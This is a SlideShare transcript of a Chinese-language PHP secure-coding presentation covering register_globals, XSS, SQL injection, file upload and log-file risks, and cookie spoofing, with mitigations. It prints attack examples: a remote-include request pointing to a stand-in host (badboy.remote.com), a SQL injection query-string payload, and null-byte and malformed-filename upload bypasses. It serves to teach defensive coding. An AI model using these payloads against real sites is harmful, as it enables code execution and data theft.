• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Php safe-code
 

Php safe-code

on

  • 1,031 views

 

Statistics

Views

Total Views
1,031
Views on SlideShare
1,031
Embed Views
0

Actions

Likes
1
Downloads
3
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Php safe-code Php safe-code Presentation Transcript

    • PHP 安全编码 ( 二 ) @ 徐钦勇 (ken@shopex.cn)
    • Register Globals: Example
      • <?php include &quot;$path/script.php&quot; ; ?>
      • 提交一个这样的请求
      • ?path=http%3A%2F%2Fbadboy.remote.com
      • include 'http://badboy.remote.com/script.php' ;
      • 这样就产生一个远程包含漏洞
    • XSS: Example
    • SQL Injection: Example
    • 数字类型输入 数字大于 2147483647 会出现溢出出现负数
    • 查询内容由外部输入 ?field=version() from injection_login where 1 #
    • SQL Injection: Solution
      • 过滤输入数据
      • 单引输入数据
      • 转义输入数据, mysql_real_escape_string ()
    • 葵花宝典 PHP Script Filter Escape Cookie Forms Referer, etc. xhtml MYSQL
    • 文件写入点 上传文件 写日志文件
    • 文件上传 1. 验证文件类型 2. 验证文件后缀名
    • 文件上传 1.00 截断 2. 畸形文件名
    • 文件上传
    • 文件写入点 写日志文件
      • 防被下载
      • 防被执行
    • COOKIE 欺诈
    • Q&A
    • Reference
      • 高级 PHP 应用程序漏洞审核技术